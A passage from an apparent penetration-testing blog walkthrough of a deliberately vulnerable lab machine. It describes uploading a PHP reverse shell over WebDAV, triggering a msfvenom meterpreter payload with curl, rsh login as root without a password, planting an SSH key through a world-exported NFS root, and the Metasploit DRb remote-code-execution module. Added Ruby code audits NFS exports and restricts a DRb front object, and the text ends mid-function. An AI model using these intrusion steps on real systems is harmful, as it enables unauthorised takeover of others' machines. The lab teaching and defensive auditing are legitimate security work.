<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu6JPpE6NKZa2xiAGv250eoaU91B_osKTX7vSRAniq-V1ytSYVNojqwt5bkQmwghXon6Ipa2h59blyd0oap22FARBTFgQyZDX4hwU1n63SeZDSxIwtQbf1hwMTOGGBlqjni7lSoCiCVie_/s1600/24_using_nc_listen_callback.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu6JPpE6NKZa2xiAGv250eoaU91B_osKTX7vSRAniq-V1ytSYVNojqwt5bkQmwghXon6Ipa2h59blyd0oap22FARBTFgQyZDX4hwU1n63SeZDSxIwtQbf1hwMTOGGBlqjni7lSoCiCVie_/s320/24_using_nc_listen_callback.png" width="320" /></a></div>
<br />
Once we have a listener, it's time to upload (with cadaver) and execute the shell...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgarUZFe6vBj-QfQHryH-lxAZpSz-jsS2vSDWgWEjbhdE4gf_LBFM5gtUtquJxFdCySiEaBsxKH-eWgb5odLbFTi0nUh935AzxuMAj_TN9yEBBv7sCAatKv6hmLh0Uu9rU5ppUoXCCXfH_d/s1600/23_upload_php_reverse_shell_cadaver.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgarUZFe6vBj-QfQHryH-lxAZpSz-jsS2vSDWgWEjbhdE4gf_LBFM5gtUtquJxFdCySiEaBsxKH-eWgb5odLbFTi0nUh935AzxuMAj_TN9yEBBv7sCAatKv6hmLh0Uu9rU5ppUoXCCXfH_d/s320/23_upload_php_reverse_shell_cadaver.png" width="320" /></a></div>
<br />
...and here is us catching the callback! We trigger the callback by visiting the malicious script in our browser. Since we uploaded myshell.php, we have to visit http://10.0.0.22/dav/myshell.php to trigger it, like this.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyqrKFQvYHza8GUnRfPym7h27_TN8u7wjSmTfa_4CQURXz0IC7iqJYvZSIxJdfkgRqqkqcwJlvPNdKzJhpFmKIAkc8X8ELY2T2Dqb0MGnGepYyOsh-SjEUsTIGOqqxoNMMOo_akuqRnCRE/s1600/25_we_got_php_reverse_shell_callback.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyqrKFQvYHza8GUnRfPym7h27_TN8u7wjSmTfa_4CQURXz0IC7iqJYvZSIxJdfkgRqqkqcwJlvPNdKzJhpFmKIAkc8X8ELY2T2Dqb0MGnGepYyOsh-SjEUsTIGOqqxoNMMOo_akuqRnCRE/s320/25_we_got_php_reverse_shell_callback.png" width="320" /></a></div>
<br />
We have a slightly more normal shell this time, but we can use the same trick, plus the credentials we know, to escalate all the way from www-data user to root.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh6SN2DVdBBF6gsrL2Ie6Yh6WanbAxjsOmNBwHgK4d6RExFhYJNm6hdS7hyphenhyphen3mvOkdl9IBuwM2Snn_S3t12WyT0S4w1o07_LJUxpIClQPtQMtYBE6TcS5ukJ85VW7_YoPBSC9dP4xoRbMSA/s1600/26_www_data_to_root_with_creds.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh6SN2DVdBBF6gsrL2Ie6Yh6WanbAxjsOmNBwHgK4d6RExFhYJNm6hdS7hyphenhyphen3mvOkdl9IBuwM2Snn_S3t12WyT0S4w1o07_LJUxpIClQPtQMtYBE6TcS5ukJ85VW7_YoPBSC9dP4xoRbMSA/s320/26_www_data_to_root_with_creds.png" width="320" /></a></div>
<br />
I think the msfadmin creds are cheating a little bit, but for demonstration's sake it serves my point. The kernel is also VERY old so there are many privilege escalation vulnerabilities that would work here...*cough cough* dirty cow *cough cough*.<br />
<br />
We can also do this with metasploit by using msfvenom to create a php payload and having metasploit catch the callback. Let's look at how we can do that.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJzPl06pPUGbzMuILQK89xHe7yeryIDdY4q3Lkf_0LqQlxb0x6QUpzVbmUqSTDjVKHOQWgrec40JvhNzH94Swww3t39GV55MNJCx4DrYeyLs47mE0fNVUbWSCgXlQlhOV2sePI4T38JFWB/s1600/27_setup_multi_handler_metasploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJzPl06pPUGbzMuILQK89xHe7yeryIDdY4q3Lkf_0LqQlxb0x6QUpzVbmUqSTDjVKHOQWgrec40JvhNzH94Swww3t39GV55MNJCx4DrYeyLs47mE0fNVUbWSCgXlQlhOV2sePI4T38JFWB/s320/27_setup_multi_handler_metasploit.png" width="320" /></a></div>
<br />
We set up a multi/handler to catch the meterpreter callback, then run it as a background job so that it catches the callback whenever it arrives.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijov3AC_wCRoRgAbpYnimUxxwvtAeD8U_X53HYjyyyM7DUGBpaar3Yx7CX1d_L5eCp4vW3Mi7e5YmTd42ct8pBjH8_DgEjbYkixiZI-uTLhpTNy7LEP7GuTKbW6po5dhpn2txKu9ixzh_v/s1600/28_multi_handler_bg_job.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijov3AC_wCRoRgAbpYnimUxxwvtAeD8U_X53HYjyyyM7DUGBpaar3Yx7CX1d_L5eCp4vW3Mi7e5YmTd42ct8pBjH8_DgEjbYkixiZI-uTLhpTNy7LEP7GuTKbW6po5dhpn2txKu9ixzh_v/s320/28_multi_handler_bg_job.png" width="320" /></a></div>
<br />
Then we needed to create our meterpreter webshell using msfvenom...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwt6nb6HkazEV8Re-eJX39h2DESnW6G0XJaM3-sCyhD1rDJ1JveqYDpRbH3YOnam_wm6gpj2e72QECpcPZDbMJuUNFoEPd5kd84AqLG-IiGQ97-ZtGo__P8tuuDi3xRuND1uwNFplucN-n/s1600/29_create_php_meterpreter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwt6nb6HkazEV8Re-eJX39h2DESnW6G0XJaM3-sCyhD1rDJ1JveqYDpRbH3YOnam_wm6gpj2e72QECpcPZDbMJuUNFoEPd5kd84AqLG-IiGQ97-ZtGo__P8tuuDi3xRuND1uwNFplucN-n/s320/29_create_php_meterpreter.png" width="320" /></a></div>
<br />
There was some issue with using the -f, or format, flag, but leaving it off worked just as well and msfvenom figured out I wanted a php script based on the payload. Next, we need to upload and call the script. I decided to show you that you don't need a browser to call the script and execute it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkPj7x43yW-kIuWCYvCkSHjVzlFDOQ-ZSo_5PBixUC34rvLYDbq5-hmPDVpjRcyvUQvFjbZWsvOZUWKKo63m5SCoO4Rkhh2gEAECCgJYKs_2sxD2_9PxTpP3fj6Nw9quUxnapdpF8ziwLs/s1600/30_upload_and_call_reverse_meterpreter_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkPj7x43yW-kIuWCYvCkSHjVzlFDOQ-ZSo_5PBixUC34rvLYDbq5-hmPDVpjRcyvUQvFjbZWsvOZUWKKo63m5SCoO4Rkhh2gEAECCgJYKs_2sxD2_9PxTpP3fj6Nw9quUxnapdpF8ziwLs/s320/30_upload_and_call_reverse_meterpreter_shell.png" width="320" /></a></div>
<br />
That curl command will not return until the shell is exited; it hangs because it is waiting on a response from the PHP script, which is busy providing my shell to the target. In the next screenshot we can see that we're running in meterpreter and can escalate to root.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiZ2YrocUB3xTrMzif4N76oaI2HRFa0TCJmjnWdG3sXwvF7bef_oDlAP0ePBZNKyVMPMpZyjPUTtlDDvATPkTL3IKXQELoPjmoeAHLqg75d8QaI1bNR9c0OjQI7PZDbimVo5JFOWmRtt4r/s1600/31_got_shell_escalate_to_root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiZ2YrocUB3xTrMzif4N76oaI2HRFa0TCJmjnWdG3sXwvF7bef_oDlAP0ePBZNKyVMPMpZyjPUTtlDDvATPkTL3IKXQELoPjmoeAHLqg75d8QaI1bNR9c0OjQI7PZDbimVo5JFOWmRtt4r/s320/31_got_shell_escalate_to_root.png" width="320" /></a></div>
<br />
<br />
Next, we're going to skip over the Samba ports for now and look at ports 512-514. These are remote shell (rsh/rlogin) ports that are open. They work very similarly to telnet or ssh by providing direct access to a shell; in this case, it's direct root access. Before trying to access this backdoor, make sure that the rsh-client package is installed on your operating system. If it is not, the operating system may fall back to ssh, which is more secure but is neither necessary nor wanted from an attacker's perspective, because the way this box is set up you can log in as root with no password.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPocJPwrdo2XvqtF8JTlWpsyy2gqJSdiUq-s844eFPUUR66LceHvYsKV-z0SWaTpM11comSL64gRFc3LN5U89ItAsuSjuC5elwQVOjAR40_2RKizayxXELgJ7csPZq1OaXX6nhX88Y24W3/s1600/32_rsh_straight_to_root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPocJPwrdo2XvqtF8JTlWpsyy2gqJSdiUq-s844eFPUUR66LceHvYsKV-z0SWaTpM11comSL64gRFc3LN5U89ItAsuSjuC5elwQVOjAR40_2RKizayxXELgJ7csPZq1OaXX6nhX88Y24W3/s320/32_rsh_straight_to_root.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRIvyFXcafbQg0qFYnu-no6YMKunvnUqyiuqIjnaw9l7O8nw54K5h5lK6-Oc2HP0oZSiohHSpcHmhAxfkhMb9oicJWYiWzaFatFyZ1vMK-fHS4rNoi67WIDcNHWBA6kPl1j_khv6p4OW9h/s1600/33_rlogin_straight_to_root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRIvyFXcafbQg0qFYnu-no6YMKunvnUqyiuqIjnaw9l7O8nw54K5h5lK6-Oc2HP0oZSiohHSpcHmhAxfkhMb9oicJWYiWzaFatFyZ1vMK-fHS4rNoi67WIDcNHWBA6kPl1j_khv6p4OW9h/s320/33_rlogin_straight_to_root.png" width="320" /></a></div>
<br />
Next, we're going to look at why a world-writable network file share is probably not a great idea. We can see from nmap running rpcinfo that NFS is running. Let's see what other information we can find about it. First we're going to run showmount -e against the target. This command shows us all the folders the target has 'exported', in other words the folders we can mount and read from or write to.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZKOHNkJ7vPF9RUJRi30Ey1Et7UlPV9AUa06S4UeiR1eN49LYDS6coMRZZqcvyEPJZopHuhXAaSh0X-Xj_1WBGueDo4T2G9s5OudF9NIr5hWS2f_xfz_meufbn3-6nwjAMPgu6qMNTjPB/s1600/34_showmount_export_root_dir.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZKOHNkJ7vPF9RUJRi30Ey1Et7UlPV9AUa06S4UeiR1eN49LYDS6coMRZZqcvyEPJZopHuhXAaSh0X-Xj_1WBGueDo4T2G9s5OudF9NIr5hWS2f_xfz_meufbn3-6nwjAMPgu6qMNTjPB/s320/34_showmount_export_root_dir.png" width="320" /></a></div>
<br />
Yup, you see that right. The root directory is being exported over the network...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Rgce4lG99PCl5rWJkRWuMmbA1UrY2ldVRXiW6rX8U7iBmDSiFjKPK6XvpzJ1xSlKyo7RFQFzbhwza7HczMObVf06iffUyGMItcGFZAWUrz1uWHHbx2N1ckGjlfM6iey6Er4I1Aetk2fv/s1600/35_mounted_nfs_all_directories_shown.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Rgce4lG99PCl5rWJkRWuMmbA1UrY2ldVRXiW6rX8U7iBmDSiFjKPK6XvpzJ1xSlKyo7RFQFzbhwza7HczMObVf06iffUyGMItcGFZAWUrz1uWHHbx2N1ckGjlfM6iey6Er4I1Aetk2fv/s320/35_mounted_nfs_all_directories_shown.png" width="320" /></a></div>
<br />
...and yup, we are able to mount it and access the entire file structure. So we can use this to our advantage by putting our public key in root's .ssh folder. This will allow us to ssh in and log in without a password, because the target will recognize us based on our ssh key.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8miJVDDX8qrZxAdjiiREUnLZB2u-VNr3dKpB3wh9v3h5ch3Gw3Tq-SekgJDZRUvTW2AjkjK2q7EYrqJ6Jc0E18CSp55qm7BPTMS7a-mMHLB4j-vEBd52Oi9pzaCPQxmNW2npaY2knTBiu/s1600/36_add_ssh_pubkey_for_ssh_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8miJVDDX8qrZxAdjiiREUnLZB2u-VNr3dKpB3wh9v3h5ch3Gw3Tq-SekgJDZRUvTW2AjkjK2q7EYrqJ6Jc0E18CSp55qm7BPTMS7a-mMHLB4j-vEBd52Oi9pzaCPQxmNW2npaY2knTBiu/s320/36_add_ssh_pubkey_for_ssh_login.png" width="320" /></a></div>
<br />
Boom, we've appended our public key to the root user's authorized_keys file which will let us log in without a password.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikGvISHPcSOUbvB6Gl477av8H9z6JPjvg0Gi1hCSK28BlNDwdJOoj267_29UmOyADtkAAQRzYS_bt0vz-jpuNq3nCQC_6HONsY-7GEvs3ORObr9j6bXEWJ1KbavcGu8IMfD9VHXIalQzHx/s1600/37_logged_in_with_my_ssh_key.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikGvISHPcSOUbvB6Gl477av8H9z6JPjvg0Gi1hCSK28BlNDwdJOoj267_29UmOyADtkAAQRzYS_bt0vz-jpuNq3nCQC_6HONsY-7GEvs3ORObr9j6bXEWJ1KbavcGu8IMfD9VHXIalQzHx/s320/37_logged_in_with_my_ssh_key.png" width="320" /></a></div>
<br />
There it is! A plain ssh to the target: no user specified, no password given; it simply logs us in because the target root user's authorized_keys file contains our public key and we hold the matching private key. We now own the box.<br />
<br />
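The export that makes all of this possible is a configuration mistake you can catch before anyone mounts it. Here is an added Ruby example (mine, not part of the original walkthrough) that parses /etc/exports and flags the dangerous combinations; the sample file is constructed, with its first line modelled on the root export showmount revealed above.<br />

```ruby
# Added example, not from the walkthrough: audit /etc/exports for the kind of
# export that let us mount "/" over NFS. The sample below is constructed; its
# first line is modelled on the root export that showmount -e reported.
EXPORTS_SAMPLE = <<~EXPORTS
  # /etc/exports: the access control list for filesystems which may be exported
  / *(rw,no_root_squash)
  /srv/public 10.0.0.0/24(ro,sync)
  /srv/data   10.0.0.5(rw,sync,root_squash)
  /srv/oops   (rw)
  /backup     backup.example.com(rw,no_root_squash,secure) \\
              10.0.0.6(ro)
EXPORTS

Export  = Struct.new(:path, :client, :options)
Finding = Struct.new(:severity, :path, :client, :reason)

# Parse exports(5) syntax: "#" comments, "\" line continuation and one or more
# client(opt,opt) specs per path. No client at all, or "(opts)" with a space
# before the parenthesis, means the export applies to every host ("*").
def parse_exports(text)
  folded = text.gsub(/\\\n\s*/, ' ')
  folded.each_line.flat_map do |raw|
    line = raw.sub(/#.*/, '').strip
    next [] if line.empty?
    path, rest = line.split(/\s+/, 2)
    tokens = (rest || '').split(/\s+/)
    tokens = [''] if tokens.empty?
    tokens.map do |tok|
      m = tok.match(/\A([^(]*)(?:\((.*)\))?\z/)
      client  = m[1].empty? ? '*' : m[1]
      options = (m[2] || '').split(',').map(&:strip).reject(&:empty?)
      Export.new(path, client, options)
    end
  end
end

# Rate one export; nil when there is nothing worth reporting.
def audit_export(e)
  world     = e.client == '*'
  writable  = e.options.include?('rw')
  no_squash = e.options.include?('no_root_squash')
  reasons = []
  reasons << 'exports the root filesystem' if e.path == '/'
  reasons << 'exported to every host' if world
  reasons << 'no_root_squash: remote root acts as local root' if no_squash
  reasons << 'insecure: accepts requests from unprivileged source ports' if e.options.include?('insecure')
  return nil if reasons.empty?

  reasons << 'writable' if writable
  severity = if writable && world && (no_squash || e.path == '/')
               :critical       # anyone can write as root: the case exploited above
             elsif writable && (world || no_squash)
               :high
             else
               :medium         # read-only or host-restricted, still worth a look
             end
  Finding.new(severity, e.path, e.client, reasons.join('; '))
end

def audit_exports(text)
  parse_exports(text).filter_map { |e| audit_export(e) }
end

if $PROGRAM_NAME == __FILE__
  audit_exports(EXPORTS_SAMPLE).each do |f|
    puts format('%-8s %s -> %s: %s', f.severity.to_s.upcase, f.path, f.client, f.reason)
  end
end
```

Run it against a real file with audit_exports(File.read('/etc/exports')); a critical finding is exactly the root-filesystem, any-host, rw, no_root_squash combination used above.<br />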
Now, let's do a metasploit exploit. There are many vulnerable services to choose from, but let's see if there is an exploit for the Ruby RMI Registry.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqfehf87q6bY9VZov5dakb_OYmjSH9YrP0A0QJ8rU3o2kaPnzaTFTukYUmEN-1gcgVzu8vdIzNUIm9QGXarWedRI1O3KVIC62ywVeGNr_NrtUA2mwAHyuCLsxoZoMmTKKMHPAMD7CVK35L/s1600/49_find_ruby_rmi_exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="822" data-original-width="880" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqfehf87q6bY9VZov5dakb_OYmjSH9YrP0A0QJ8rU3o2kaPnzaTFTukYUmEN-1gcgVzu8vdIzNUIm9QGXarWedRI1O3KVIC62ywVeGNr_NrtUA2mwAHyuCLsxoZoMmTKKMHPAMD7CVK35L/s320/49_find_ruby_rmi_exploit.png" width="320" /></a></div>
<br />
There is! We found it in metasploit by searching for 'ruby rmi'. Once we have it, the options are pretty simple and we just set the correct IP address.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGluZbPll03QWH5i2P-g_xDtAdp8Ry6__INCcIbYBj7OseDN2dGwgjrBBbBXbKHpI8Y9oSAPrUJyAPxheoZi9v5Sd47iq3zAv2Ka_oNy_KT2qr_jVrKugzVXPZlJJ7gVHb7a1JUOLQGO0p/s1600/50_set_exploit_options.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="822" data-original-width="880" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGluZbPll03QWH5i2P-g_xDtAdp8Ry6__INCcIbYBj7OseDN2dGwgjrBBbBXbKHpI8Y9oSAPrUJyAPxheoZi9v5Sd47iq3zAv2Ka_oNy_KT2qr_jVrKugzVXPZlJJ7gVHb7a1JUOLQGO0p/s320/50_set_exploit_options.png" width="320" /></a></div>
<br />
Now let's run the exploit and see what happens.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjsdn0D6Fe2IVGt6FScKgk7JLZM-y3qasi0OgERkMsSFc05h7nxA8ggNtYhRdGEMcamdhfb0vS-W51LVWUG8Wf5NWn_gJLoDl0cdtjACVh32H6Z7Q3T67Y6Aj21dy1nNq-07fijbI91wT/s1600/51_exploit_successful.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="822" data-original-width="880" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjsdn0D6Fe2IVGt6FScKgk7JLZM-y3qasi0OgERkMsSFc05h7nxA8ggNtYhRdGEMcamdhfb0vS-W51LVWUG8Wf5NWn_gJLoDl0cdtjACVh32H6Z7Q3T67Y6Aj21dy1nNq-07fijbI91wT/s320/51_exploit_successful.png" width="320" /></a></div>
<br />
Boom! We got a shell and are root. Now, how did this exploit work? Let's check out the source code for this exploit. We'll work through the source code bit by bit. First...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPQL_3bO2uwiPMCmItfojuD-tS5O-7lAghLUqUx4AlkNXxv67SQzDWWWzqwSI4Fj1I5xJUciRe9phNg2vtgmo3r_q0b-yCcvdsNNzV1T9UG2t0crKHjBKXZ0aQnrc_kk4eZoUw5VDs16ZM/s1600/52_exploit_source_code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="867" data-original-width="1600" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPQL_3bO2uwiPMCmItfojuD-tS5O-7lAghLUqUx4AlkNXxv67SQzDWWWzqwSI4Fj1I5xJUciRe9phNg2vtgmo3r_q0b-yCcvdsNNzV1T9UG2t0crKHjBKXZ0aQnrc_kk4eZoUw5VDs16ZM/s320/52_exploit_source_code.png" width="320" /></a></div>
<br />
This first chunk of code defines the function 'exploit' and checks the options we set within metasploit. If the URI option and the RHOST option are both set, we print an error because the exploit does not know which one to use. The section immediately below it checks the opposite: if neither is set, it prints an error because it doesn't have a target. Let's look at the next section...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp52dzuvh5tCqOyII7IGvhXmlk2pOIEQMtvVZ86Z43cCUGscdzMEIfpxMSW3Vofc1HUpTg9VdyQ2T3ilqhWjXCJ17TYl1D1U5Ms-X4pWiN-_fcWEJUX5MQ5cGxgWjmctPRC-gcAp8f6zI_/s1600/53_exploit_source_code_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="867" data-original-width="1600" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp52dzuvh5tCqOyII7IGvhXmlk2pOIEQMtvVZ86Z43cCUGscdzMEIfpxMSW3Vofc1HUpTg9VdyQ2T3ilqhWjXCJ17TYl1D1U5Ms-X4pWiN-_fcWEJUX5MQ5cGxgWjmctPRC-gcAp8f6zI_/s320/53_exploit_source_code_2.png" width="320" /></a></div>
<br />
Once we have passed the first two sanity checks for the options, if the URI option is NOT blank, we can parse the URI to fill in the RHOST and RPORT options. If it was blank, then we use the specified RHOST and RPORT options to construct the URI.<br />
<br />
All of this work so far has been to build the target from simple host and port options. This is one of the biggest pros of metasploit: it can make anyone a very sophisticated penetration tester or hacker by abstracting away a lot of the technical knowledge. In no way does anyone need to know that it's using the druby:// protocol to use this exploit. All you need to know is that Ruby RMI is running, the host it's running on, and the port it's running on, and we can instantly get a root shell.<br />
<br />
Moving on to the next part, we start to see the real exploit being built.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAPwOyUePqA3QDxGu8U6AnzRuSpZ83MjlKUOp8lA71d6CCuKay46auezBT9Po6DPx68drRpNUMM4prtrF6lB3_-dSoXZS3IQ4moMPpwF4tWo7_p_-tMdoeeMucJYZagrY2zdGOzntfPpja/s1600/54_exploit_source_code_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1040" data-original-width="1152" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAPwOyUePqA3QDxGu8U6AnzRuSpZ83MjlKUOp8lA71d6CCuKay46auezBT9Po6DPx68drRpNUMM4prtrF6lB3_-dSoXZS3IQ4moMPpwF4tWo7_p_-tMdoeeMucJYZagrY2zdGOzntfPpja/s320/54_exploit_source_code_3.png" width="320" /></a></div>
<br />
Here we instantiate the DRb service and connect to the remote DRb service that is hosted on the metasploitable machine. By itself, this does not seem to be malicious as we're just connecting to a service on a remote system; something we do every time we browse the web. What makes this different is learning more about the DRb service and objects. We can learn all we need to know from this page about the DRb service and objects: <a href="https://ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html">https://ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html</a>.<br />
<br />
This service allows one machine to connect and execute code on the remote machine in the context of a ruby process. Since a ruby process can run a shell, we can use this to get a remote shell and thereby compromise the remote machine.<br />
<br />
In the second block of the above image, you can see the methods variable has three strings in an array. These three strings represent method calls that can be used to achieve remote code execution on the remote machine. In the link above for DRb, you can actually see a version of this exploit under the "Security" header.<br />
<br />
Lastly, the exploit tries each of the methods to execute code on the remote machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidj3_mQ5KjLNY3Cy1wFpF5rOLD1oAoLnNguXf5cp2jmx_pof1xotWSoRYfzXgSv3YYRoYKczpfRcPJr1f33JcnWkQZHbbMbUuLX7K2cZjURTL_BfpndKLJNLq9po__J6ruO7M_mvstGFM9/s1600/55_exploit_source_code_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1040" data-original-width="1152" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidj3_mQ5KjLNY3Cy1wFpF5rOLD1oAoLnNguXf5cp2jmx_pof1xotWSoRYfzXgSv3YYRoYKczpfRcPJr1f33JcnWkQZHbbMbUuLX7K2cZjURTL_BfpndKLJNLq9po__J6ruO7M_mvstGFM9/s320/55_exploit_source_code_4.png" width="320" /></a></div>
<br />
The `methods.each do |method|` line is ruby's equivalent of a for loop: for each entry in the 'methods' array, run the block that follows. That block prints the status, sends the method it's trying to use, and runs a handler to facilitate the connection between the local and remote machines. If there is an error, it prints a warning and tries the next method. If none of them work, we will see three warning messages that say "The target is not vulnerable to &lt;method name&gt; method" and the process will exit in Metasploit.<br />
<br />
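From the defender's side, the common thread is that DRb will hand any public method of the front object to a remote caller, so the fix is a front object with nothing public except what you mean to export. The Ruby below is an added example, not the Metasploit module or the drb library: a naive front beside a restricted one, exercised through a simplified model of DRb's server-side check-and-dispatch (what the real server refuses beyond `__send__`, and which harmless methods it calls on the front object, are assumptions noted in the comments).<br />

```ruby
# Added example, neither the Metasploit module nor the drb library: a DRb front
# object that exports only an explicit allow-list, beside the naive front object
# that makes the instance_eval method above work.

# The object that does the work; it should never be reachable in full.
class StatusService
  def ping
    'pong'
  end

  def status
    { service: 'status', healthy: true }
  end
end

# Naive front: a plain Object, so every public method it inherits, including
# BasicObject#instance_eval and Kernel#send, is callable by a remote peer.
class NaiveFront < StatusService
end

# Restricted front: forward only ALLOWED, and undefine every other public method
# Object/Kernel hands us, so a request for anything else fails closed.
class RestrictedFront
  ALLOWED = %i[ping status].freeze
  # Harmless methods left in place because DRb's server (assumption for this
  # example) inspects the front with private_methods/protected_methods before
  # dispatching via __send__, and uses nil?/__id__ for object references.
  KEEP = %i[__send__ __id__ object_id nil? hash == != ! equal? eql? class
            is_a? kind_of? instance_of? respond_to? to_s inspect frozen?
            private_methods protected_methods public_methods methods
            singleton_methods].freeze

  def initialize(backend)
    @backend = backend
  end

  ALLOWED.each do |name|
    define_method(name) { |*args| @backend.public_send(name, *args) }
  end

  (public_instance_methods - ALLOWED - KEEP).each { |m| undef_method(m) }
end

# Simplified model of DRb::DRbServer::InvokeMethod (an assumption, not the real
# code): refuse __send__ by name, refuse non-public methods, then dispatch with
# __send__. Any public method of the front object goes through.
def drb_dispatch(front, msg_id, *argv)
  raise SecurityError, "insecure method `#{msg_id}'" if msg_id == :__send__
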